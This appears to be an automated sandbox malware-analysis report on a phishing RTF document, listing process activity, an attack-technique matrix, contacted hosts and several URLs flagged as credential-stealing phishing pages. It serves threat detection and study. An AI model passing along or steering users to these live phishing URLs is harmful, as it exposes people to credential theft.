Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1729790489\LICENSE.txtJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation2
Scripting
1
Process Injection
11
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Deobfuscate/Decode Files or Information
Security Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
File Deletion
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Extra Window Memory Injection
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.html100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://s3.eu-west-1.amazonaws.com/favicon.ico0%Avira URL Cloudsafe
https://gambol.smarthost.pl/amdhcrviewpmt0%Avira URL Cloudsafe
https://gambol.smarthost.pl/favicon.ico0%Avira URL Cloudsafe
https://o365.alnassers.net/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s3.eu-west-1.amazonaws.com
52.218.122.88
truefalse
    unknown
    code.jquery.com
    151.101.194.137
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.24.14
      truefalse
        high
        gambol.smarthost.pl
        91.211.222.250
        truetrue
          unknown
          challenges.cloudflare.com
          104.18.95.41
          truefalse
            high
            www.google.com
            142.250.184.228
            truefalse
              high
              api.ipify.org
              104.26.12.205
              truefalse
                high
                o365.alnassers.net
                147.79.74.176
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e30d87ec8a16c3f&lang=autofalse
                    high
                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/false
                      high
                      https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.jsfalse
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                          high
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e30d87ec8a16c3f/1731690534483/YsSzfqJgTmO8M-Efalse
                            high
                            https://code.jquery.com/jquery-3.6.0.min.jsfalse
                              high
                              https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.htmltrue
                              • SlashNext: Credential Stealing type: Phishing & Social Engineering
                              unknown
                              https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                high
                                https://o365.alnassers.net/false
                                • Avira URL Cloud: safe
                                unknown
                                https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                  high
                                  https://api.ipify.org/?format=jsonfalse
                                    high
                                    https://gambol.smarthost.pl/amdhcrviewpmt/true
                                      unknown
                                      https://gambol.smarthost.pl/favicon.icofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8e30d87ec8a16c3f/1731690534487/5c0d70b800e056611086d4f5f24c9950452decee7f463be7f314e1558386e50c/qYoTKdafX5udHN4false
                                          high
                                          https://gambol.smarthost.pl/amdhcrviewpmtfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                            high
                                            https://s3.eu-west-1.amazonaws.com/favicon.icofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://github.com/easylist)LICENSE.txt.4.drfalse
                                              high
                                              https://creativecommons.org/.LICENSE.txt.4.drfalse
                                                high
                                                https://easylist.to/)LICENSE.txt.4.drfalse
                                                  high
                                                  https://creativecommons.org/compatiblelicensesLICENSE.txt.4.drfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.18.94.41
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    151.101.130.137
                                                    unknownUnited States
                                                    54113FASTLYUSfalse
                                                    147.79.74.176
                                                    o365.alnassers.netUnited States
                                                    208485EKSENBILISIMTRfalse
                                                    91.211.222.250
                                                    gambol.smarthost.plPoland
                                                    39566TRUSTNET-PL-ASPLtrue
                                                    151.101.194.137
                                                    code.jquery.comUnited States
                                                    54113FASTLYUSfalse
                                                    142.250.184.228
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    104.17.24.14
                                                    cdnjs.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.26.12.205
                                                    api.ipify.orgUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.18.95.41
                                                    challenges.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    52.218.122.88
                                                    s3.eu-west-1.amazonaws.comUnited States
                                                    16509AMAZON-02USfalse
                                                    239.255.255.250
                                                    unknownReserved
                                                    unknownunknownfalse
                                                    104.17.25.14
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    172.67.74.152
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    IP
                                                    192.168.2.16
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1556628
                                                    Start date and time:2024-11-15 18:08:07 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 5m 39s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:15
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Iamgold-PYMPATA Policy_Enrollment2024739441.rtf
                                                    Detection:MAL
                                                    Classification:mal60.phis.winRTF@26/287@28/14
                                                    EGA Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .rtf
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 184.28.90.27, 142.250.185.163, 142.250.186.142, 74.125.133.84, 34.104.35.123, 20.189.173.23, 95.101.111.179, 95.101.111.168, 88.221.110.138, 88.221.110.227, 142.250.184.227, 142.250.185.206
                                                    • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, clients2.google.com, e16604.g.akamaiedge.net, update.googleapis.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, clients1.google.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, accounts.google.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, e26769.dscb.akamaiedge.net, edgedl.me.gvt1.com, s-0005.s-msedge.net, config.officeapps.live.com, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, clients.l.google.com, onedscolprdwus16.westus.cloudapp.azure.com, europe.configsvc1.live.com.
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: Iamgold-PYMPATA Policy_Enrollment2024739441.rtf
                                                    No simulations
                                                    SourceURL
                                                    Screenshothttps://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.html
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    147.79.74.176https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25Get hashmaliciousUnknownBrowse
                                                      scan3762399_arleen@wcctxlaw.com.pdfGet hashmaliciousUnknownBrowse
                                                        ACTION REQUIRED Revised Billing #NL992-071 From Robinson Aviation Inc.msgGet hashmaliciousUnknownBrowse
                                                          https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Get hashmaliciousUnknownBrowse
                                                            https://pub-535a4999ab4b4c1e81647bad9b888e40.r2.dev/onedrivefresh.htmlGet hashmaliciousUnknownBrowse
                                                              https://merzcon-my.sharepoint.com/:f:/g/personal/cnico_merzcon_onmicrosoft_com/EmjHG5K9dP9BtgBBeTTFhjABJRRLGM6IhVrJlwBTMWY8rg?e=pfkS1fGet hashmaliciousUnknownBrowse
                                                                https://netorg11230081-my.sharepoint.com/:f:/g/personal/info_onafastpacecontracting_com/Eoa77Lo8BXlOut3qDNQUDAQBBgmgCvIALxhAXrlqjk9Asw?e=2UKAY6Get hashmaliciousUnknownBrowse
                                                                  104.18.94.41https://onlinedropboxfile.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                    Bthomas_Record_Adjustment.docxGet hashmaliciousHTMLPhisherBrowse
                                                                      Play_AUD__Aib_8973534156.htmlGet hashmaliciousUnknownBrowse
                                                                        Tjones-In Service Agreement-817744.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                          704b67b5-6bc9-dbd5-0710-60eb98e03983.emlGet hashmaliciousUnknownBrowse
                                                                            NewVoicemail - +1 392 504 7XXX00-33Rebecca.silvaTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                              https://pxc.etemenonfor.com/lyKCxL5/#Ipoeschl@poeschl-tobacco.deGet hashmaliciousUnknownBrowse
                                                                                https://www.google.es/url?q=queryrp18(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fpreview.adope.jp%2fod%2f8gqnmo6zgfuuc6sej4k7rfdswihr8l%2fZnJhbnMuZW5nZWxicmVjaHRAYXJkYWdoZ3JvdXAuY29t$?Get hashmaliciousUnknownBrowse
